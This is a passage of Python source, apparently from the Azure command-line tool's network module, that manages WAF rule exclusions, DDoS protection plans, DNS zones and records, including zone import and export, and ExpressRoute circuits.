def remove_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions = []
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# pylint: disable=line-too-long
# pylint: disable=too-many-nested-blocks
def add_waf_exclusion_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
match_variable, selector_match_operator, selector,
rule_group_name=None, rule_ids=None):
ExclusionManagedRuleSet, ExclusionManagedRuleGroup, ExclusionManagedRule = \
cmd.get_models('ExclusionManagedRuleSet', 'ExclusionManagedRuleGroup', 'ExclusionManagedRule')
waf_policy = client.get(resource_group_name, policy_name)
# build current rules from ids
rules = [ExclusionManagedRule(rule_id=rule_id) for rule_id in rule_ids] if rule_ids is not None else []
# build current rule group from rules
curr_rule_group = None
if rule_group_name is not None:
curr_rule_group = ExclusionManagedRuleGroup(rule_group_name=rule_group_name,
rules=rules)
# build current rule set from rule group
curr_rule_set = ExclusionManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_groups=[curr_rule_group] if curr_rule_group is not None else [])
for exclusion in waf_policy.managed_rules.exclusions:
if exclusion.match_variable == match_variable and exclusion.selector_match_operator == selector_match_operator and exclusion.selector == selector:
for rule_set in exclusion.exclusion_managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
for rule_group in rule_set.rule_groups:
# add rules when rule group exists
if rule_group.rule_group_name == rule_group_name:
rule_group.rules.extend(rules)
break
else:
# add a new rule group
if curr_rule_group is not None:
rule_set.rule_groups.append(curr_rule_group)
break
else:
# add a new rule set
exclusion.exclusion_managed_rule_sets.append(curr_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
# pylint: disable=line-too-long
def remove_waf_exclusion_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
match_variable, selector_match_operator, selector,
rule_group_name=None):
waf_policy = client.get(resource_group_name, policy_name)
to_be_deleted = None
for exclusion in waf_policy.managed_rules.exclusions:
if exclusion.match_variable == match_variable and exclusion.selector_match_operator == selector_match_operator and exclusion.selector == selector:
for rule_set in exclusion.exclusion_managed_rule_sets:
if rule_group_name is None:
to_be_deleted = rule_set
break
rule_group = next((rule_group for rule_group in rule_set.rule_groups if rule_group.rule_group_name == rule_group_name), None)
if rule_group is None:
err_msg = f"Rule set group [{rule_group_name}] is not found."
raise ResourceNotFoundError(err_msg)
rule_set.rule_groups.remove(rule_group)
if to_be_deleted:
exclusion.exclusion_managed_rule_sets.remove(to_be_deleted)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_exclusion_rule_set(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationSecurityGroups
def create_asg(cmd, client, resource_group_name, application_security_group_name, location=None, tags=None):
ApplicationSecurityGroup = cmd.get_models('ApplicationSecurityGroup')
asg = ApplicationSecurityGroup(location=location, tags=tags)
return client.begin_create_or_update(resource_group_name, application_security_group_name, asg)
def update_asg(instance, tags=None):
if tags is not None:
instance.tags = tags
return instance
# endregion
# region DdosProtectionPlans
def create_ddos_plan(cmd, resource_group_name, ddos_plan_name, location=None, tags=None, vnets=None):
from azure.cli.core.commands import LongRunningOperation
ddos_client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
ddos_protection_plan = cmd.get_models('DdosProtectionPlan')()
if location:
ddos_protection_plan.location = location
if tags:
ddos_protection_plan.tags = tags
if not vnets:
# if no VNETs can do a simple PUT
return ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)
# if VNETs specified, have to create the protection plan and then add the VNETs
plan_id = LongRunningOperation(cmd.cli_ctx)(
ddos_client.begin_create_or_update(resource_group_name, ddos_plan_name, parameters=ddos_protection_plan)).id
SubResource = cmd.get_models('SubResource')
logger.info('Attempting to attach VNets to newly created DDoS protection plan.')
for vnet_subresource in vnets:
vnet_client = network_client_factory(cmd.cli_ctx).virtual_networks
id_parts = parse_resource_id(vnet_subresource.id)
vnet = vnet_client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=plan_id)
vnet_client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return ddos_client.get(resource_group_name, ddos_plan_name)
def update_ddos_plan(cmd, instance, tags=None, vnets=None):
SubResource = cmd.get_models('SubResource')
if tags is not None:
instance.tags = tags
if vnets is not None:
logger.info('Attempting to update the VNets attached to the DDoS protection plan.')
vnet_ids = set([])
if len(vnets) == 1 and not vnets[0]:
pass
else:
vnet_ids = {x.id for x in vnets}
existing_vnet_ids = {x.id for x in instance.virtual_networks} if instance.virtual_networks else set([])
client = network_client_factory(cmd.cli_ctx).virtual_networks
for vnet_id in vnet_ids.difference(existing_vnet_ids):
logger.info("Adding VNet '%s' to plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = SubResource(id=instance.id)
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
for vnet_id in existing_vnet_ids.difference(vnet_ids):
logger.info("Removing VNet '%s' from plan.", vnet_id)
id_parts = parse_resource_id(vnet_id)
vnet = client.get(id_parts['resource_group'], id_parts['name'])
vnet.ddos_protection_plan = None
client.begin_create_or_update(id_parts['resource_group'], id_parts['name'], vnet)
return instance
def list_ddos_plans(cmd, resource_group_name=None):
client = network_client_factory(cmd.cli_ctx).ddos_protection_plans
if resource_group_name:
return client.list_by_resource_group(resource_group_name)
return client.list()
# endregion
# region DNS Commands
# add delegation name server record for the created child zone in it's parent zone.
def add_dns_delegation(cmd, child_zone, parent_zone, child_rg, child_zone_name):
"""
:param child_zone: the zone object corresponding to the child that is created.
:param parent_zone: the parent zone name / FQDN of the parent zone.
if parent zone name is mentioned, assume current subscription and resource group.
:param child_rg: resource group of the child zone
:param child_zone_name: name of the child zone
"""
import sys
from azure.core.exceptions import HttpResponseError
parent_rg = child_rg
parent_subscription_id = None
parent_zone_name = parent_zone
if is_valid_resource_id(parent_zone):
id_parts = parse_resource_id(parent_zone)
parent_rg = id_parts['resource_group']
parent_subscription_id = id_parts['subscription']
parent_zone_name = id_parts['name']
if all([parent_zone_name, parent_rg, child_zone_name, child_zone]) and child_zone_name.endswith(parent_zone_name):
record_set_name = child_zone_name.replace('.' + parent_zone_name, '')
try:
for dname in child_zone.name_servers:
add_dns_ns_record(cmd, parent_rg, parent_zone_name, record_set_name, dname, parent_subscription_id)
print('Delegation added succesfully in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print('Could not add delegation in \'{}\'\n'.format(parent_zone_name), file=sys.stderr)
def create_dns_zone(cmd, client, resource_group_name, zone_name, parent_zone_name=None, tags=None,
if_none_match=False, zone_type='Public', resolution_vnets=None, registration_vnets=None):
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
zone = Zone(location='global', tags=tags)
if hasattr(zone, 'zone_type'):
zone.zone_type = zone_type
zone.registration_virtual_networks = registration_vnets
zone.resolution_virtual_networks = resolution_vnets
created_zone = client.create_or_update(resource_group_name, zone_name, zone,
if_none_match='*' if if_none_match else None)
if cmd.supported_api_version(min_api='2016-04-01') and parent_zone_name is not None:
logger.info('Attempting to add delegation in the parent zone')
add_dns_delegation(cmd, created_zone, parent_zone_name, resource_group_name, zone_name)
return created_zone
def update_dns_zone(instance, tags=None, zone_type=None, resolution_vnets=None, registration_vnets=None):
if tags is not None:
instance.tags = tags
if zone_type:
instance.zone_type = zone_type
if resolution_vnets == ['']:
instance.resolution_virtual_networks = None
elif resolution_vnets:
instance.resolution_virtual_networks = resolution_vnets
if registration_vnets == ['']:
instance.registration_virtual_networks = None
elif registration_vnets:
instance.registration_virtual_networks = registration_vnets
return instance
def list_dns_zones(cmd, resource_group_name=None):
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).zones
if resource_group_name:
return ncf.list_by_resource_group(resource_group_name)
return ncf.list()
def create_dns_record_set(cmd, resource_group_name, zone_name, record_set_name, record_set_type,
metadata=None, if_match=None, if_none_match=None, ttl=3600, target_resource=None):
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
SubResource = cmd.get_models('SubResource', resource_type=ResourceType.MGMT_NETWORK)
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = RecordSet(
ttl=ttl,
metadata=metadata,
target_resource=SubResource(id=target_resource) if target_resource else None
)
return client.create_or_update(resource_group_name, zone_name, record_set_name,
record_set_type, record_set, if_match=if_match,
if_none_match='*' if if_none_match else None)
def list_dns_record_set(client, resource_group_name, zone_name, record_type=None):
if record_type:
return client.list_by_type(resource_group_name, zone_name, record_type)
return client.list_by_dns_zone(resource_group_name, zone_name)
def update_dns_record_set(instance, cmd, metadata=None, target_resource=None):
if metadata is not None:
instance.metadata = metadata
if target_resource == '':
instance.target_resource = None
elif target_resource is not None:
SubResource = cmd.get_models('SubResource')
instance.target_resource = SubResource(id=target_resource)
return instance
def _type_to_property_name(key):
type_dict = {
'a': 'a_records',
'aaaa': 'aaaa_records',
'caa': 'caa_records',
'cname': 'cname_record',
'mx': 'mx_records',
'ns': 'ns_records',
'ptr': 'ptr_records',
'soa': 'soa_record',
'spf': 'txt_records',
'srv': 'srv_records',
'txt': 'txt_records',
}
return type_dict[key.lower()]
def export_zone(cmd, resource_group_name, zone_name, file_name=None):
from time import localtime, strftime
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
record_sets = client.record_sets.list_by_dns_zone(resource_group_name, zone_name)
zone_obj = OrderedDict({
'$origin': zone_name.rstrip('.') + '.',
'resource-group': resource_group_name,
'zone-name': zone_name.rstrip('.'),
'datetime': strftime('%a, %d %b %Y %X %z', localtime())
})
for record_set in record_sets:
record_type = record_set.type.rsplit('/', 1)[1].lower()
record_set_name = record_set.name
record_data = getattr(record_set, _type_to_property_name(record_type), None)
# ignore empty record sets
if not record_data:
continue
if not isinstance(record_data, list):
record_data = [record_data]
if record_set_name not in zone_obj:
zone_obj[record_set_name] = OrderedDict()
for record in record_data:
record_obj = {'ttl': record_set.ttl}
if record_type not in zone_obj[record_set_name]:
zone_obj[record_set_name][record_type] = []
if record_type == 'aaaa':
record_obj.update({'ip': record.ipv6_address})
elif record_type == 'a':
record_obj.update({'ip': record.ipv4_address})
elif record_type == 'caa':
record_obj.update({'val': record.value, 'tag': record.tag, 'flags': record.flags})
elif record_type == 'cname':
record_obj.update({'alias': record.cname.rstrip('.') + '.'})
elif record_type == 'mx':
record_obj.update({'preference': record.preference, 'host': record.exchange.rstrip('.') + '.'})
elif record_type == 'ns':
record_obj.update({'host': record.nsdname.rstrip('.') + '.'})
elif record_type == 'ptr':
record_obj.update({'host': record.ptrdname.rstrip('.') + '.'})
elif record_type == 'soa':
record_obj.update({
'mname': record.host.rstrip('.') + '.',
'rname': record.email.rstrip('.') + '.',
'serial': int(record.serial_number), 'refresh': record.refresh_time,
'retry': record.retry_time, 'expire': record.expire_time,
'minimum': record.minimum_ttl
})
zone_obj['$ttl'] = record.minimum_ttl
elif record_type == 'srv':
record_obj.update({'priority': record.priority, 'weight': record.weight,
'port': record.port, 'target': record.target.rstrip('.') + '.'})
elif record_type == 'txt':
record_obj.update({'txt': ''.join(record.value)})
zone_obj[record_set_name][record_type].append(record_obj)
zone_file_content = make_zone_file(zone_obj)
print(zone_file_content)
if file_name:
try:
with open(file_name, 'w') as f:
f.write(zone_file_content)
except IOError:
raise CLIError('Unable to export to file: {}'.format(file_name))
# pylint: disable=too-many-return-statements, inconsistent-return-statements
def _build_record(cmd, data):
AaaaRecord, ARecord, CaaRecord, CnameRecord, MxRecord, NsRecord, PtrRecord, SoaRecord, SrvRecord, TxtRecord = \
cmd.get_models('AaaaRecord', 'ARecord', 'CaaRecord', 'CnameRecord', 'MxRecord', 'NsRecord',
'PtrRecord', 'SoaRecord', 'SrvRecord', 'TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_type = data['delim'].lower()
try:
if record_type == 'aaaa':
return AaaaRecord(ipv6_address=data['ip'])
if record_type == 'a':
return ARecord(ipv4_address=data['ip'])
if (record_type == 'caa' and
supported_api_version(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS, min_api='2018-03-01-preview')):
return CaaRecord(value=data['val'], flags=int(data['flags']), tag=data['tag'])
if record_type == 'cname':
return CnameRecord(cname=data['alias'])
if record_type == 'mx':
return MxRecord(preference=data['preference'], exchange=data['host'])
if record_type == 'ns':
return NsRecord(nsdname=data['host'])
if record_type == 'ptr':
return PtrRecord(ptrdname=data['host'])
if record_type == 'soa':
return SoaRecord(host=data['host'], email=data['email'], serial_number=data['serial'],
refresh_time=data['refresh'], retry_time=data['retry'], expire_time=data['expire'],
minimum_ttl=data['minimum'])
if record_type == 'srv':
return SrvRecord(
priority=int(data['priority']), weight=int(data['weight']), port=int(data['port']),
target=data['target'])
if record_type in ['txt', 'spf']:
text_data = data['txt']
return TxtRecord(value=text_data) if isinstance(text_data, list) else TxtRecord(value=[text_data])
except KeyError as ke:
raise CLIError("The {} record '{}' is missing a property. {}"
.format(record_type, data['name'], ke))
# pylint: disable=too-many-statements
def import_zone(cmd, resource_group_name, zone_name, file_name):
from azure.cli.core.util import read_file_content
from azure.core.exceptions import HttpResponseError
import sys
logger.warning("In the future, zone name will be case insensitive.")
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
from azure.cli.core.azclierror import FileOperationError, UnclassifiedUserFault
try:
file_text = read_file_content(file_name)
except FileNotFoundError:
raise FileOperationError("No such file: " + str(file_name))
except IsADirectoryError:
raise FileOperationError("Is a directory: " + str(file_name))
except PermissionError:
raise FileOperationError("Permission denied: " + str(file_name))
except OSError as e:
raise UnclassifiedUserFault(e)
zone_obj = parse_zone_file(file_text, zone_name)
origin = zone_name
record_sets = {}
for record_set_name in zone_obj:
for record_set_type in zone_obj[record_set_name]:
record_set_obj = zone_obj[record_set_name][record_set_type]
if record_set_type == 'soa':
origin = record_set_name.rstrip('.')
if not isinstance(record_set_obj, list):
record_set_obj = [record_set_obj]
for entry in record_set_obj:
record_set_ttl = entry['ttl']
record_set_key = '{}{}'.format(record_set_name.lower(), record_set_type)
record = _build_record(cmd, entry)
if not record:
logger.warning('Cannot import %s. RecordType is not found. Skipping...', entry['delim'].lower())
continue
record_set = record_sets.get(record_set_key, None)
if not record_set:
# Workaround for issue #2824
relative_record_set_name = record_set_name.rstrip('.')
if not relative_record_set_name.endswith(origin):
logger.warning(
'Cannot import %s. Only records relative to origin may be '
'imported at this time. Skipping...', relative_record_set_name)
continue
record_set = RecordSet(ttl=record_set_ttl)
record_sets[record_set_key] = record_set
_add_record(record_set, record, record_set_type,
is_list=record_set_type.lower() not in ['soa', 'cname'])
total_records = 0
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = rs_name[:-(len(origin) + 1)] if rs_name != origin else '@'
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
total_records += record_count
cum_records = 0
client = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS)
print('== BEGINNING ZONE IMPORT: {} ==\n'.format(zone_name), file=sys.stderr)
Zone = cmd.get_models('Zone', resource_type=ResourceType.MGMT_NETWORK_DNS)
client.zones.create_or_update(resource_group_name, zone_name, Zone(location='global'))
for key, rs in record_sets.items():
rs_name, rs_type = key.lower().rsplit('.', 1)
rs_name = '@' if rs_name == origin else rs_name
if rs_name.endswith(origin):
rs_name = rs_name[:-(len(origin) + 1)]
try:
record_count = len(getattr(rs, _type_to_property_name(rs_type)))
except TypeError:
record_count = 1
if rs_name == '@' and rs_type == 'soa':
root_soa = client.record_sets.get(resource_group_name, zone_name, '@', 'SOA')
rs.soa_record.host = root_soa.soa_record.host
rs_name = '@'
elif rs_name == '@' and rs_type == 'ns':
root_ns = client.record_sets.get(resource_group_name, zone_name, '@', 'NS')
root_ns.ttl = rs.ttl
rs = root_ns
rs_type = rs.type.rsplit('/', 1)[1]
try:
client.record_sets.create_or_update(
resource_group_name, zone_name, rs_name, rs_type, rs)
cum_records += record_count
print("({}/{}) Imported {} records of type '{}' and name '{}'"
.format(cum_records, total_records, record_count, rs_type, rs_name), file=sys.stderr)
except HttpResponseError as ex:
logger.error(ex)
print("\n== {}/{} RECORDS IMPORTED SUCCESSFULLY: '{}' =="
.format(cum_records, total_records, zone_name), file=sys.stderr)
def add_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
ttl=3600, if_none_match=None):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
ttl=3600, if_none_match=None):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name, 'arecords',
ttl=ttl, if_none_match=if_none_match)
def add_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value, flags, tag,
ttl=3600, if_none_match=None):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname, ttl=3600, if_none_match=None):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, ttl=ttl, if_none_match=if_none_match)
def add_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
ttl=3600, if_none_match=None):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def add_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
subscription_id=None, ttl=3600, if_none_match=None):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
subscription_id=subscription_id, ttl=ttl, if_none_match=if_none_match)
def add_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname, ttl=3600, if_none_match=None):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
ttl=ttl, if_none_match=if_none_match)
def update_dns_soa_record(cmd, resource_group_name, zone_name, host=None, email=None,
serial_number=None, refresh_time=None, retry_time=None, expire_time=None,
minimum_ttl=3600, if_none_match=None):
record_set_name = '@'
record_type = 'soa'
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record = record_set.soa_record
record.host = host or record.host
record.email = email or record.email
record.serial_number = serial_number or record.serial_number
record.refresh_time = refresh_time or record.refresh_time
record.retry_time = retry_time or record.retry_time
record.expire_time = expire_time or record.expire_time
record.minimum_ttl = minimum_ttl or record.minimum_ttl
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, if_none_match=if_none_match)
def add_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, if_none_match=None):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def add_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value, if_none_match=None):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
long_text = ''.join(x for x in record.value)
original_len = len(long_text)
record.value = []
while len(long_text) > 255:
record.value.append(long_text[:255])
long_text = long_text[255:]
record.value.append(long_text)
final_str = ''.join(record.value)
final_len = len(final_str)
assert original_len == final_len
return _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
if_none_match=if_none_match)
def remove_dns_aaaa_record(cmd, resource_group_name, zone_name, record_set_name, ipv6_address,
keep_empty_record_set=False):
AaaaRecord = cmd.get_models('AaaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = AaaaRecord(ipv6_address=ipv6_address)
record_type = 'aaaa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_a_record(cmd, resource_group_name, zone_name, record_set_name, ipv4_address,
keep_empty_record_set=False):
ARecord = cmd.get_models('ARecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = ARecord(ipv4_address=ipv4_address)
record_type = 'a'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_caa_record(cmd, resource_group_name, zone_name, record_set_name, value,
flags, tag, keep_empty_record_set=False):
CaaRecord = cmd.get_models('CaaRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CaaRecord(flags=flags, tag=tag, value=value)
record_type = 'caa'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_cname_record(cmd, resource_group_name, zone_name, record_set_name, cname,
keep_empty_record_set=False):
CnameRecord = cmd.get_models('CnameRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = CnameRecord(cname=cname)
record_type = 'cname'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=False, keep_empty_record_set=keep_empty_record_set)
def remove_dns_mx_record(cmd, resource_group_name, zone_name, record_set_name, preference, exchange,
keep_empty_record_set=False):
MxRecord = cmd.get_models('MxRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = MxRecord(preference=int(preference), exchange=exchange)
record_type = 'mx'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ns_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
NsRecord = cmd.get_models('NsRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = NsRecord(nsdname=dname)
record_type = 'ns'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_ptr_record(cmd, resource_group_name, zone_name, record_set_name, dname,
keep_empty_record_set=False):
PtrRecord = cmd.get_models('PtrRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = PtrRecord(ptrdname=dname)
record_type = 'ptr'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_srv_record(cmd, resource_group_name, zone_name, record_set_name, priority, weight,
port, target, keep_empty_record_set=False):
SrvRecord = cmd.get_models('SrvRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = SrvRecord(priority=priority, weight=weight, port=port, target=target)
record_type = 'srv'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def remove_dns_txt_record(cmd, resource_group_name, zone_name, record_set_name, value,
keep_empty_record_set=False):
TxtRecord = cmd.get_models('TxtRecord', resource_type=ResourceType.MGMT_NETWORK_DNS)
record = TxtRecord(value=value)
record_type = 'txt'
return _remove_record(cmd.cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set=keep_empty_record_set)
def _check_a_record_exist(record, exist_list):
for r in exist_list:
if r.ipv4_address == record.ipv4_address:
return True
return False
def _check_aaaa_record_exist(record, exist_list):
for r in exist_list:
if r.ipv6_address == record.ipv6_address:
return True
return False
def _check_caa_record_exist(record, exist_list):
for r in exist_list:
if (r.flags == record.flags and
r.tag == record.tag and
r.value == record.value):
return True
return False
def _check_cname_record_exist(record, exist_list):
for r in exist_list:
if r.cname == record.cname:
return True
return False
def _check_mx_record_exist(record, exist_list):
for r in exist_list:
if (r.preference == record.preference and
r.exchange == record.exchange):
return True
return False
def _check_ns_record_exist(record, exist_list):
for r in exist_list:
if r.nsdname == record.nsdname:
return True
return False
def _check_ptr_record_exist(record, exist_list):
for r in exist_list:
if r.ptrdname == record.ptrdname:
return True
return False
def _check_srv_record_exist(record, exist_list):
for r in exist_list:
if (r.priority == record.priority and
r.weight == record.weight and
r.port == record.port and
r.target == record.target):
return True
return False
def _check_txt_record_exist(record, exist_list):
for r in exist_list:
if r.value == record.value:
return True
return False
def _record_exist_func(record_type):
return globals()["_check_{}_record_exist".format(record_type)]
def _add_record(record_set, record, record_type, is_list=False):
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is None:
setattr(record_set, record_property, [])
record_list = getattr(record_set, record_property)
_record_exist = _record_exist_func(record_type)
if not _record_exist(record, record_list):
record_list.append(record)
else:
setattr(record_set, record_property, record)
def _add_save_record(cmd, record, record_type, record_set_name, resource_group_name, zone_name,
is_list=True, subscription_id=None, ttl=None, if_none_match=None):
from azure.core.exceptions import HttpResponseError
ncf = get_mgmt_service_client(cmd.cli_ctx, ResourceType.MGMT_NETWORK_DNS,
subscription_id=subscription_id).record_sets
try:
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
except HttpResponseError:
RecordSet = cmd.get_models('RecordSet', resource_type=ResourceType.MGMT_NETWORK_DNS)
record_set = RecordSet(ttl=3600)
if ttl is not None:
record_set.ttl = ttl
_add_record(record_set, record, record_type, is_list)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name,
record_type, record_set,
if_none_match='*' if if_none_match else None)
def _remove_record(cli_ctx, record, record_type, record_set_name, resource_group_name, zone_name,
keep_empty_record_set, is_list=True):
ncf = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_NETWORK_DNS).record_sets
record_set = ncf.get(resource_group_name, zone_name, record_set_name, record_type)
record_property = _type_to_property_name(record_type)
if is_list:
record_list = getattr(record_set, record_property)
if record_list is not None:
keep_list = [r for r in record_list
if not dict_matches_filter(r.__dict__, record.__dict__)]
if len(keep_list) == len(record_list):
raise CLIError('Record {} not found.'.format(str(record)))
setattr(record_set, record_property, keep_list)
else:
setattr(record_set, record_property, None)
if is_list:
records_remaining = len(getattr(record_set, record_property))
else:
records_remaining = 1 if getattr(record_set, record_property) is not None else 0
if not records_remaining and not keep_empty_record_set:
logger.info('Removing empty %s record set: %s', record_type, record_set_name)
return ncf.delete(resource_group_name, zone_name, record_set_name, record_type)
return ncf.create_or_update(resource_group_name, zone_name, record_set_name, record_type, record_set)
def dict_matches_filter(d, filter_dict):
sentinel = object()
return all(not filter_dict.get(key, None) or
str(filter_dict[key]) == str(d.get(key, sentinel)) or
lists_match(filter_dict[key], d.get(key, []))
for key in filter_dict)
def lists_match(l1, l2):
try:
return Counter(l1) == Counter(l2) # pylint: disable=too-many-function-args
except TypeError:
return False
# endregion
# region ExpressRoutes
def create_express_route(cmd, circuit_name, resource_group_name, bandwidth_in_mbps, peering_location,
service_provider_name, location=None, tags=None, no_wait=False,
sku_family=None, sku_tier=None, allow_global_reach=None, express_route_port=None,
allow_classic_operations=None):
ExpressRouteCircuit, ExpressRouteCircuitSku, ExpressRouteCircuitServiceProviderProperties, SubResource = \
cmd.get_models(
'ExpressRouteCircuit', 'ExpressRouteCircuitSku', 'ExpressRouteCircuitServiceProviderProperties',
'SubResource')
client = network_client_factory(cmd.cli_ctx).express_route_circuits
sku_name = '{}_{}'.format(sku_tier, sku_family)
circuit = ExpressRouteCircuit(
location=location, tags=tags,
service_provider_properties=ExpressRouteCircuitServiceProviderProperties(
service_provider_name=service_provider_name,
peering_location=peering_location,
bandwidth_in_mbps=bandwidth_in_mbps if not express_route_port else None),
sku=ExpressRouteCircuitSku(name=sku_name, tier=sku_tier, family=sku_family),
allow_global_reach=allow_global_reach,
bandwidth_in_gbps=(int(bandwidth_in_mbps) / 1000) if express_route_port else None
)
if cmd.supported_api_version(min_api='2010-07-01') and allow_classic_operations is not None:
circuit.allow_classic_operations = allow_classic_operations
if cmd.supported_api_version(min_api='2018-08-01') and express_route_port:
circuit.express_route_port = SubResource(id=express_route_port)
circuit.service_provider_properties = None
return sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, circuit_name, circuit)
